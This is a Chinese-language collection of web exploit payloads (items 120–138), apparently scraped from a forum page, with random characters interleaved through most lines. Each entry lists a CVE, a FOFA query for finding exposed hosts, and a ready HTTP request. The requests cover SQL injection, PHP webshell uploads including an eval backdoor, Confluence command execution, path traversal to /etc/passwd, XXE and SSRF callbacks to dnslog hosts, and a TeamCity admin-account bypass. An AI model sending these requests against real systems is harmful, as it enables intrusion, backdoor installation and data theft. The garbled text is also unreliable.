$ |) ~# n6 q4 V% Y0 Q7 APOST /sysmanage/sysmanageajax.php HTTP/1.11
9 B4 X, x; M  s9 fHost: x.x.x.x
4 T+ @; e% r. E; pCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
9 N3 w1 y/ c: TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
; R! Y+ `# {* t3 |' h! QAccept: */*
; l8 S" Y4 @! M+ L5 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ K. z! n  q) n3 i% ^$ JAccept-Encoding: gzip, deflate$ t' x0 z, T) R* u. _$ O. M2 b
Content-Type: application/x-www-form-urlencoded;
3 k, h4 _2 u$ ]0 T2 JContent-Length: 109" p7 z- ]! i' q7 e
Origin: https://58.18.133.60:8443
# Q+ z4 O6 F( c( y2 yReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
) }  z  _% \2 Q6 }4 M" L6 fSec-Fetch-Dest: empty0 H/ K9 Q1 N( r- ^0 E
Sec-Fetch-Mode: cors( s- `/ j/ l: v( A( f$ f6 q  _
Sec-Fetch-Site: same-origin
$ h6 v1 Y  u2 HX-Forwarded-For: 1.1.1.1
7 s3 E2 H% l$ `" h8 _1 s0 nX-Originating-Ip: 1.1.1.1
( w. i, p; S% Q5 x8 p, X+ PX-Remote-Ip: 1.1.1.12 J* h' w- P$ E& Y3 H
X-Remote-Addr: 1.1.1.1, T3 _; n) Q! w% M
Te: trailers
2 v: {/ ], Z8 qConnection: close
5 r" b4 E1 i! A8 L5 W8 e6 N4 V  g+ T( n+ O0 ]
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
( D& C/ p" h9 L0 F; w% p5 E/ }* l9 n# N: {( }

" G; M: [3 w6 Q) L! V7 }4 I, _! ~+ w120. 北京百绰智能S40管理平台导入web.php任意文件上传- E7 }! O5 x* l. l4 Q, r
CVE-2024-1253
' y& ]+ F# z) m- |1 D7 UFOFA:title="Smart管理平台"9 x4 D6 I1 H. ]6 I& o3 K0 q
POST /useratte/web.php? HTTP/1.1
/ ?* X- l/ E, @Host: ip:port( Y( V% i- I' T' ?. |
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
5 M+ ^. d# p, q1 \; q- c5 V) \! @: lUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko( m8 y3 x" ]% t& G5 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 ]& t7 N# d* Q6 y' x' e* u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 G2 \+ i3 y& `% k4 @Accept-Encoding: gzip, deflate
8 a7 U5 T: {, a- A+ nContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
5 v' E% |! P  q$ K7 q7 g  |- SContent-Length: 597
7 s: s- G2 m0 H" A4 n# J  ZOrigin: https://ip:port
" w9 g( L8 H1 j' b& G0 [7 QReferer: https://ip:port/sysmanage/licence.php% i/ O" o  r  b/ c7 {/ r
Upgrade-Insecure-Requests: 1
3 C; ?2 U* `4 G1 X$ QSec-Fetch-Dest: document% d4 d4 K* c( h, t5 ^
Sec-Fetch-Mode: navigate6 l, C: r" c& Y& s4 o8 D8 ]& p; r
Sec-Fetch-Site: same-origin0 o) e; b: H7 x: X+ j4 \$ J/ @0 m
Sec-Fetch-User: ?1
5 v- |6 H# k& [2 v& U  D* YTe: trailers$ R1 r; d/ S, z4 P( u
Connection: close
: {5 S( N. `( @8 l9 z2 {# ~
! R5 e5 V* F. L& x. [-----------------------------423289041236658752706300793289 I- ]: E; L' N; U0 J) i7 a! W
Content-Disposition: form-data; name="file_upload"; filename="2.php"( c4 L0 |9 v/ Y2 \0 |* p0 e) W9 V
Content-Type: application/octet-stream# `8 Q. G1 p( Y
( t, l1 C' X  j- |1 q7 d7 g
<?php phpinfo()?>& i* u) V* L5 J( j% E
-----------------------------42328904123665875270630079328: M* I0 l% L0 P4 [9 q; a) b. {
Content-Disposition: form-data; name="id_type"2 @2 V; X* w  W  r: l' n  m
6 {& h$ @! V+ U8 x3 Q* ^
1, ]+ [0 a# z- o, ~
-----------------------------42328904123665875270630079328
  K3 c; o8 l3 E0 N) j/ vContent-Disposition: form-data; name="1_ck"3 }3 J3 C" P5 C6 D1 H8 q
7 C- Q% A3 ]1 f2 d, H5 M3 Y3 S% G- P
1_radhttp
$ F+ O3 d: M% X3 b5 S5 O+ @5 l) ^$ e-----------------------------42328904123665875270630079328+ F! F' X' ^1 E' b, B
Content-Disposition: form-data; name="mode"
* q3 ~" e' a" V
8 N+ e- E% o1 Iimport$ J) f2 ]" @/ f
-----------------------------42328904123665875270630079328
+ c% ?( I8 X  L/ N4 V- j. Q8 C& }1 k8 K

8 A  x3 ]! \% D# A3 M% D5 `1 p文件路径/upload/2.php
1 K  ?3 C5 c) u$ |: V7 h; t; b; R4 d/ a3 M
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
! w' q7 N- u+ E. X9 H- ~) @CVE-2024-1918
8 H( J" k6 I6 S* C+ G; E1 E$ Z: _. GFOFA:title="Smart管理平台"
7 z7 G; g8 [3 Y- W: MPOST /useratte/userattestation.php HTTP/1.1
" f" x8 @& j* c" w! LHost: 192.168.40.130:8443
- g1 I% m% |0 _& H' n$ ]Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
4 \, p9 @. o. n/ fUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko6 ]" U. M1 X4 ]8 T7 ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 ?* C3 ^5 K4 J+ o2 w: f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: e. ~- ^/ q' ^2 h
Accept-Encoding: gzip, deflate. ]% q7 H" U( h; B; x/ D, _4 _
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793282 J) Y, b' `& k
Content-Length: 592
3 }; H, S' u% Y( D) J2 SOrigin: https://192.168.40.130:8443' D( ~! q2 a, h5 ~  l
Upgrade-Insecure-Requests: 1- @; W( z1 B+ r( G. i7 ^' h
Sec-Fetch-Dest: document& O* d2 \  C' _$ f7 K. [
Sec-Fetch-Mode: navigate( e) J+ o9 r3 V6 B! ]
Sec-Fetch-Site: same-origin
5 Q$ l3 |  Y* MSec-Fetch-User: ?1
6 e" S* n- _. X: QTe: trailers
5 V4 k+ U, l2 K, T1 _Connection: close
, T) b& e+ S) K& T0 |' |' S8 A1 ?; v
-----------------------------42328904123665875270630079328
- \0 {9 V" V& k# tContent-Disposition: form-data; name="web_img"; filename="1.php"
* f" _& H) U) v, D% n" s% j. ~+ lContent-Type: application/octet-stream& @6 c1 w, b3 K1 g. Q' Y4 |
5 C6 g. A; }1 z
<?php phpinfo();?>
& V5 P" q* a: X* u-----------------------------42328904123665875270630079328
- I$ D! M4 ]/ x+ n( DContent-Disposition: form-data; name="id_type"
- X) ?6 |0 x; k. _% M3 [1 Z% [; j9 ^5 A
16 t. [; O% J0 g$ i. n
-----------------------------42328904123665875270630079328+ F0 ]! J! X' G! H3 w$ L0 j
Content-Disposition: form-data; name="1_ck"
) [- R& `/ ?9 h( U/ V3 D7 \! I  e8 ^, H- c1 O- }. ?
1_radhttp+ F( M4 l6 P, i8 X- X
-----------------------------42328904123665875270630079328% w9 L, @6 ^; J2 d
Content-Disposition: form-data; name="hidwel"+ V6 ^6 L4 j3 I8 e

" j; o: a) ]4 _5 M9 Uset+ c( l! c' p1 F5 V% U
-----------------------------42328904123665875270630079328
0 I9 l, N, q) ~$ w2 X. P
$ D+ P. a0 Z: C% t2 [7 @. o3 J% E( I
6 W! A! v, P% |' Nboot/web/upload/weblogo/1.php8 |+ `# @8 `% I& @% `

" a4 ?5 H$ p9 _6 u" K+ R122. 北京百绰智能s200管理平台/importexport.php sql注入9 {9 \8 G0 Q3 w+ I& W
CVE-2024-27718FOFA:title="Smart管理平台"" i" {/ l" j! p' P4 {
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
# p0 x& Y; U; _5 d* k: hGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1+ S& K: |  W8 F
Host: x.x.x.x: H1 |& r" e2 e) G4 u- f) q$ f6 D
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
* X) T) P, N0 L. Z: q* z8 V" s$ yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0. I* m: D/ F1 m& z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* o  o- z% o8 }& R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% o: ]; j9 x: ]
Accept-Encoding: gzip, deflate, br
& ]6 ?3 P* {! I6 V+ H- WUpgrade-Insecure-Requests: 1
$ K+ x1 r! |$ {Sec-Fetch-Dest: document; G. @' i" V% J" z5 d
Sec-Fetch-Mode: navigate2 @0 z5 a) l5 ~! I6 z8 c
Sec-Fetch-Site: none- I3 a  T8 Z% B7 s. U# ~
Sec-Fetch-User: ?19 y7 B4 L, h/ o- r. T& V
Te: trailers& C. I% W8 q& |% n8 w+ h$ \$ m
Connection: close; n2 l/ r! `0 J- _! l: V$ a! \+ U
2 J6 P1 ^; |) L

3 Q/ m5 [/ H* p% O& Q6 M123. Atlassian Confluence 模板注入代码执行3 c8 b$ F8 S6 Q" j. `8 N
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"# e( b3 ?( W: Q" l; X2 v( e
POST /template/aui/text-inline.vm HTTP/1.18 y; W0 e( M5 P" p8 O" o+ t; u
Host: localhost:80900 m$ f! k+ n) p. `9 N5 R6 s# g
Accept-Encoding: gzip, deflate, br! v: `5 U. X! b2 \  O
Accept: */*, B! m5 s- ?4 S& Z9 a) ]
Accept-Language: en-US;q=0.9,en;q=0.8% G8 V$ I) Z% r2 i$ g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
& z8 d) p) e' M) s  NConnection: close
! y- H# t. t5 G" \4 Y" B, vContent-Type: application/x-www-form-urlencoded6 l7 ~# J/ i/ J

# i& Y; c0 Q% v$ X" C& Qlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))1 ~, F0 J9 h# X
) o1 \% Y6 V8 m6 w# C

  A2 Z5 \3 f2 B$ E124. 湖南建研工程质量检测系统任意文件上传
$ q4 [# B7 ]  }; P3 A$ xFOFA:body="/Content/Theme/Standard/webSite/login.css", Q, b$ j. U  K" ~' }
POST /Scripts/admintool?type=updatefile HTTP/1.1* E8 V' ?0 X! k, p5 s2 z* z% n
Host: 192.168.40.130:8282" T+ q. z+ D3 p: r( A, \
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36/ k1 q2 e9 A2 u
Content-Length: 723 l2 }- t& A! o- Z; ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
* z- w: L( X; t8 j% q: s& U4 nAccept-Encoding: gzip, deflate, br
) Y. ~! ~: I( C! N5 R8 B/ uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: H& `; A0 V6 p$ c5 zConnection: close6 t+ Y4 k% b+ b( \/ E' l) w7 G
Content-Type: application/x-www-form-urlencoded
1 M# s5 F; B& [( I/ }# _# h
4 T/ t& `  M4 u0 Q! l% F' S, bfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
& m: w& y) `0 @$ M4 `# o' A
$ Y. O" B, ]1 |
9 u/ t' O/ G$ A7 e: z) l  Chttp://192.168.40.130:8282/Scripts/abcgcg.aspx
- t9 _' A+ @& W  D5 ]; J* u$ @" {4 x4 }5 X& R- m8 j) Z3 \
125. ConnectWise ScreenConnect身份验证绕过& Y* {6 J/ m+ ^5 g
CVE-2024-17093 o# r( v- ], @0 @7 x
FOFA:icon_hash="-82958153"! ^1 }- W0 J8 e5 m/ A% q6 G
https://github.com/watchtowrlabs ... bypass-add-user-poc
- M; H- N* U" T* f# ]* Q6 C$ h9 k& |- V# G( D6 a

) E3 d. }0 r/ ?4 p使用方法0 G5 v- h4 t2 |: K% v
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
- [- h+ I( w3 W( z  k0 p0 D5 T/ J; o! P" j3 {9 d8 ]1 a
( C) S2 m: _1 M. @* N
创建好用户后直接登录后台,可以执行系统命令。
' ?& D1 @( z: n6 A. m* V7 u/ k3 o9 ~; ]3 }, M+ A: R3 ~& f
126. Aiohttp 路径遍历
# j; ]8 A/ r) u. m! xFOFA:title=="ComfyUI"$ x: y8 M0 w! u1 ^: ~+ X
GET /static/../../../../../etc/passwd HTTP/1.1
0 V2 b- k9 B  U2 Q# k7 YHost: x.x.x.x
- U9 ?# e6 ~0 u. x( r0 A% }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36' k2 s* H1 w7 ]
Connection: close. d# d3 {5 i! [& L9 N7 e% m
Accept: */*) A& j. q6 L3 U% k, I9 |
Accept-Language: en
$ N/ j9 F9 A4 ?% ]- e0 iAccept-Encoding: gzip
4 G, G$ }4 p: P* w
# {( p% P+ V0 ]" L, \- r" q4 |* A
127. 广联达Linkworks DataExchange.ashx XXE
, N+ U, A( s( M7 U% yFOFA:body="Services/Identification/login.ashx" 2 N0 o; p5 j+ }( f
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1& R6 J; l5 U) s$ Y* K2 ]) J6 z
Host: 192.168.40.130:88883 n+ S) o! G$ X+ K" a1 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.364 q( n4 `0 J" u4 T$ `4 T
Content-Length: 415
4 K; f+ U+ S; E# C" rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( Z1 O% i) u7 O) l2 O6 @
Accept-Encoding: gzip, deflate- u' F% I! z$ m  \# r8 P
Accept-Language: zh-CN,zh;q=0.9; J$ J- ]! e0 i: j. n
Connection: close
9 ^0 e/ \/ ~) e* L) cContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe00 u  P4 z7 k! w4 L( @" }( q# g1 v6 p6 h
Purpose: prefetch  ]4 ^" n5 `; A" A' G
Sec-Purpose: prefetch;prerender- V$ ]& f* ?' x! s# U

5 n+ b; J$ u2 [6 N) E& x! N------WebKitFormBoundaryJGgV5l5ta05yAIe0
6 u6 d8 d4 D# ?' hContent-Disposition: form-data;name="SystemName"$ y& A( i" r, {
4 I! ?+ t9 w0 Y) p
BIM+ M0 F7 C3 |( j; c# s& N9 E
------WebKitFormBoundaryJGgV5l5ta05yAIe05 P" c! M. ~$ T+ L5 m
Content-Disposition: form-data;name="Params". H/ y  ]; A, H9 t4 V
Content-Type: text/plain
: ^% h- }& B1 z1 p6 z# o# B2 o: ]2 R! m( P
<?xml version="1.0" encoding="UTF-8"?>7 H8 \$ L' Y3 Z; k
<!DOCTYPE test [
2 J* E9 x; E9 v; t4 B<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
: S% ^6 V, w, o]8 Y( |! s% k, f! }. v: _
>7 `) q" e. ]& E
<test>&t;</test>( \& i9 C- P7 Y( t
------WebKitFormBoundaryJGgV5l5ta05yAIe0--- C! Q( R. s5 c

: {: a9 J0 G0 L+ N& U9 }7 x1 t. o. q7 I
+ ~. e6 I- h! m4 P% r' |
128. Adobe ColdFusion 反序列化9 [) @8 L4 g" R9 y: x0 @, d
CVE-2023-38203) I( b" ?5 Q$ o0 K" v1 L- _
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
! u) b! M& r# r6 \/ r' I# k% oFOFA:app="Adobe-ColdFusion"
: h/ q6 F* u, lPAYLOAD
: v- W8 A& V* [  `8 X2 f
5 Q- b+ Y6 D- T! _( H0 Y129. Adobe ColdFusion 任意文件读取1 @7 h9 M0 L1 Z4 Z* g
CVE-2024-20767+ d* _6 l, P' a8 [' ?6 h
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
; a, D! w% c% g8 b4 f! w3 ?第一步,获取uuid
; n4 K$ U; J+ y6 G! ?3 i; AGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1/ p( ?/ I/ W( w* U* _
Host: x.x.x.x% t! ]% Z/ L. u7 A4 }0 P2 Z8 J9 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
/ z. K0 y2 D" @, ^5 NAccept: */*1 D, ^7 ^8 d4 d. `  Q1 N+ }% T
Accept-Encoding: gzip, deflate) h' N) S! C% a" J0 r$ e: v8 o
Connection: close
9 e/ ^5 W. |/ d# m+ o' Q3 G0 v/ u( S( K, J, @7 }  v5 X
" g( e3 w& z: i: V9 G3 e3 q
第二步,读取/etc/passwd文件  f6 d: K# q$ d/ x5 q
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.17 g, s& k; x% y8 m$ Z5 V
Host: x.x.x.x' w/ y. ~% `$ Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
) s2 e' @( U+ S, \Accept: */*1 ~! P3 z) F2 ?0 Z2 I
Accept-Encoding: gzip, deflate9 Y% V, S  E, Z7 o0 y
Connection: close, P6 O' z& u, G8 o0 N
uuid: 85f60018-a654-4410-a783-f81cbd5000b9; j8 w+ w# R, |. j

7 q( n* [/ Q' E  L. L+ l% K) L# U9 a4 f% w, I& S) [
130. Laykefu客服系统任意文件上传
0 C8 J/ j7 [+ v& k$ MFOFA:icon_hash="-334624619"/ _6 ?3 n. s1 e; Q9 U
POST /admin/users/upavatar.html HTTP/1.1
  X" N& Z9 t. QHost: 127.0.0.1
' g: x" C' Q' F" _+ u4 iAccept: application/json, text/javascript, */*; q=0.01
  c1 f7 N2 V  r6 a# \7 T- SX-Requested-With: XMLHttpRequest
9 Q* `, Q0 B/ |! d, r: R% YUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
5 c% B1 G0 x; HContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
, K% r4 s, {: ?3 a8 lAccept-Encoding: gzip, deflate# f! Z; T$ ]! M* P
Accept-Language: zh-CN,zh;q=0.92 m8 h$ q' S0 F) Y. G
Cookie: user_name=1; user_id=3
8 P- U! u6 j5 m6 x5 Q, g$ C- B" ?9 {Connection: close2 O2 y$ ]* j5 k; y# G

0 n7 f% p3 i; V: G. V------WebKitFormBoundary3OCVBiwBVsNuB2kR% n& @1 ?$ D  [# f1 D
Content-Disposition: form-data; name="file"; filename="1.php"
) @0 v  p4 Z9 v7 |  F7 r) a: f  BContent-Type: image/png$ t2 j" x5 [6 E% k0 ]* m7 v
# x  v/ B1 X: x3 v: b
<?php phpinfo();@eval($_POST['sec']);?>( N# b- ?. A6 j0 M7 X, p7 |' V* @
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
  Q. U& @- y& E2 }$ Q
" I! w4 h' M0 N1 j# R) p7 V4 h
9 {4 h& U4 \! Y8 t5 e* I6 ?131. Mini-Tmall <=20231017 SQL注入
* {, \# f% Z6 I/ y8 t0 L- \0 @FOFA:icon_hash="-2087517259"
; v: S; ~3 v+ H0 Y- J0 c后台地址:http://localhost:8080/tmall/admin4 T& U( b& L& f, d
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
0 G( B: T+ a7 F$ k0 Y6 M# ?) U2 \: p  ]) d
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
) ]7 o( z5 Z! `, I) u2 R. cCVE-2024-27198+ _4 [! k5 b% H! k4 e+ X( @
FOFA:body="Log in to TeamCity"
+ M8 F, p, v; k) N7 K( ^. O6 DPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.10 N& U( R3 U3 l- [( w; h. V
Host: 192.168.40.130:8111
0 D: j1 D5 `; k) F/ s0 L, iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
& c5 a! @  ^+ b2 O, ^Accept: */*
3 _$ O, S* N1 m2 W( _Content-Type: application/json
- ~8 a. u3 y7 ?* t# yAccept-Encoding: gzip, deflate
3 ?7 Y" f; d  l. }0 K# j/ w" a6 W& S' \/ L* I. h
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
/ [3 d3 U. j* a6 W- Y+ Z$ b6 M( I" e8 ]; N6 M

; |3 n/ M5 `: h  M- C& |7 s7 GCVE-2024-27199
0 Q1 M/ t% a" j1 S) m/res/../admin/diagnostic.jsp
5 W3 r/ J# l) w1 A& n/.well-known/acme-challenge/../../admin/diagnostic.jsp% r, n8 m* H" Q3 B7 t
/update/../admin/diagnostic.jsp1 ?* R" f  e$ {' i
2 \: z9 m( b) y
1 f3 {( z9 I6 L# v: \9 i
CVE-2024-27198-RCE.py1 z1 l! Z# i7 z+ f" G
/ z2 L0 r8 v1 Z: C+ c' I
133. H5 云商城 file.php 文件上传
+ @$ Q6 _8 T9 q( n5 UFOFA:body="/public/qbsp.php"
, Z0 S% z1 g* Y% T3 c. i9 fPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1& X. g( j5 p1 `. B% m
Host: your-ip4 |6 P2 Z; [9 h4 s3 E( R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36) E. j0 J/ G* k: _; _( o
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
" ?) S0 k. P* e! P. f, U" D& _0 u- V
------WebKitFormBoundaryFQqYtrIWb8iBxUCx7 {, ~  ?! t+ A% z! s) _
Content-Disposition: form-data; name="file"; filename="rce.php"% a( }3 I5 t4 H
Content-Type: application/octet-stream
% C# l3 t  M! c1 s- ~  n3 x 7 ~/ F5 E, |  i3 s: Z& M/ L
<?php system("cat /etc/passwd");unlink(__FILE__);?>/ r+ a- Y& V% _! |5 i7 Q) ?
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
8 r- W4 i2 V7 {; W' |
8 w" w- s. H# p9 b/ v6 p% m( X7 N$ f  {+ D( p
% `+ a1 v8 J5 t3 a
134. 网康NS-ASG应用安全网关index.php sql注入! ?0 v$ a" H& K! }# ~
CVE-2024-2330
8 r$ F' G" R: |4 |1 t( hNetentsec NS-ASG Application Security Gateway 6.3版本
3 q1 u/ F) P/ ^FOFA:app="网康科技-NS-ASG安全网关", b& T0 ]( `0 v& Q
POST /protocol/index.php HTTP/1.1/ A1 o. _$ C( r5 s0 l# x3 |$ s
Host: x.x.x.x2 Z) T% \) q9 U) T: ^
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
7 [9 c' K, z# ]  B8 _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
& F: ~% _& F& ^9 ]Accept: */*
% y' l4 _9 b. d. iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- Y: k: _' `$ m3 gAccept-Encoding: gzip, deflate
3 z7 [7 Y* \! s' ]: YSec-Fetch-Dest: empty
" e/ u4 m% J1 a* YSec-Fetch-Mode: cors# c) D% P3 `4 @
Sec-Fetch-Site: same-origin
8 H; ^# D/ x- Z* HTe: trailers
. ^1 J* _: S$ X2 R9 IConnection: close
5 j# B4 }: G" @" {Content-Type: application/x-www-form-urlencoded0 t; q5 d/ d% {; I1 Y) T3 W" k' V
Content-Length: 263
9 ?- q& F2 O1 C. g4 n5 ~# B0 g# \. n  R5 R* q
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
6 `  W$ a" ^$ S. ]% J& n/ @+ O6 P  I* Y
: }+ J0 [! S. \# J
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入6 N5 t: I2 z- M! t
CVE-2024-2022! k8 _$ o( i- I" d2 x% \3 M
Netentsec NS-ASG Application Security Gateway 6.3版本
$ P+ S* Y! Z3 P2 NFOFA:app="网康科技-NS-ASG安全网关"1 w: C: P. w! @6 U3 m0 `
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
8 ~+ f- S+ x, u  ?# O! pHost: x.x.x.x: ^) E4 \, a: X9 J# [& F1 _9 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.367 W2 a, o- }% P, F# m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& D$ P8 c  V8 P2 `
Accept-Encoding: gzip, deflate8 {1 ?  \; d2 U; ~: B0 O
Accept-Language: zh-CN,zh;q=0.97 B$ I% I: y8 n: }- g1 Q
Connection: close
1 b% d# f" R& i' h) D7 t$ Z' V5 b3 }% K! V# T

0 ~- ]  S5 s1 u( m" O  Q136. NextChat cors SSRF7 m' T: ^, w7 U4 ~3 d2 s
CVE-2023-49785
, E+ T% g, d( j. D. G. ~8 RFOFA:title="NextChat"
. ~& j- ?: x+ n; q; [- VGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.19 |. S( w7 ]- Y7 Z# p
Host: x.x.x.x:10000
& N" B& a: b7 B  ]User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 [8 Y; ?, G1 I. l8 e' X
Connection: close
3 ~3 d- y, m: a+ c! [5 A# E4 Q$ FAccept: */*
+ Z& X7 s3 r: h- y! d  fAccept-Language: en/ V6 I2 F1 ^9 \" a1 M$ {3 ?6 ~/ S/ n0 ?
Accept-Encoding: gzip
' D7 s2 M& m9 A) n: w, N7 B
) s' }1 G$ }- U
8 u3 f( w& I! g0 E: p137. 福建科立迅通信指挥调度平台down_file.php sql注入
* U. C4 q* x1 m( F. m8 [5 t5 Z" QCVE-2024-26208 Y. h+ x$ _  _' w- d( ^+ L
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"0 c: G- ^- s4 V$ m% T: J
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
2 ?; k# S7 Z% ?8 I* kHost: x.x.x.x
8 {2 q7 }& A" sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0/ ^* t* K* l3 k6 O/ A! R' f/ [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 ?: z6 y& \) T" r6 L. h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 D  x+ N! T) O7 H% rAccept-Encoding: gzip, deflate, br
2 |: T# r& m4 o0 T' d' l: AConnection: close" m) m/ |1 f7 A% ^$ f/ q; X6 w2 s
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
4 o1 Q# J# P' S) @+ D0 OUpgrade-Insecure-Requests: 1' K/ {% w3 e& b

, M# Y& b5 o4 ?8 v  b, }4 v" |: b2 ~. w- R- q! ?+ `# n
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入4 E, [3 t& k8 i  C0 z4 j
CVE-2024-2621! F, a1 Q' @& u) F1 G/ Y0 e7 Z; n
